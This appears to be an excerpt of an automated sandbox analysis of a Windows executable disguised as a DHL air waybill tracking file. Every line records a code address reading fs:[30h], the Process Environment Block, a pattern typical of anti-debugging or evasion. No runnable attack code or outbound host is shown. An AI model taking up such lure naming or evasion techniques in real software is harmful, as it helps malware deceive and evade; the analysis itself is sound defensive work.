          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h]1_2_00A2C182
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h]1_2_00A3A185
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h]1_2_00A32990
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A0B1E1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A0B1E1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A0B1E1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h]1_2_00A941E8
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]1_2_00A3513A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]1_2_00A3513A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]1_2_00A09100
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]1_2_00A09100
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]1_2_00A09100
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h]1_2_00A0C962
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]1_2_00A0B171
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]1_2_00A0B171
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]1_2_00A2B944
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]1_2_00A2B944
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A1AAB0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A1AAB0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A3FAB0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]1_2_00A3D294
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]1_2_00A3D294
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h]1_2_00A32AE4
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h]1_2_00A32ACB
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]1_2_00A44A2C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]1_2_00A44A2C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h]1_2_00A18A0A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]1_2_00A0AA16
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]1_2_00A0AA16
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h]1_2_00A23A1C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]1_2_00ABB260
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]1_2_00ABB260
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h]1_2_00AD8A62
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h]1_2_00A4927A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h]1_2_00ACEA55
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h]1_2_00A94257
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]1_2_00AD5BA5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]1_2_00A34BAD
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]1_2_00A34BAD
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]1_2_00A34BAD
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h]1_2_00AC138A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h]1_2_00ABD380
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]1_2_00A11B8F
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]1_2_00A11B8F
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h]1_2_00A3B390
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h]1_2_00A32397
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A2DBE9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]1_2_00A853CA
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]1_2_00A853CA
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h]1_2_00AC131B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A0DB60
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]1_2_00A33B7A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]1_2_00A33B7A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h]1_2_00A0DB40
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h]1_2_00AD8B58
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h]1_2_00A0F358
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h]1_2_00A1849B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h]1_2_00AC14FB
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AD8CD6
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h]1_2_00A3BC2C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h]1_2_00A2746D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h]1_2_00A3A44B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]1_2_00A9C450
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]1_2_00A9C450
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]1_2_00AD05AC
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]1_2_00AD05AC
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h]1_2_00A335A1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]1_2_00A3FD9B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]1_2_00A3FD9B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A1D5E0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A1D5E0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AB8DF1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h]1_2_00A0AD30
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h]1_2_00ACE539
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h]1_2_00AD8D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h]1_2_00A8A537
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h]1_2_00A43D43
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h]1_2_00A83540
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h]1_2_00A27D50
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h]1_2_00A846A7
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h]1_2_00A9FE87
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h]1_2_00A316E0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h]1_2_00A176E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h]1_2_00A48EC7
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]1_2_00ABFEC0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h]1_2_00A336CC
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AD8ED6
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h]1_2_00A0E620
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h]1_2_00ABFE3F
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
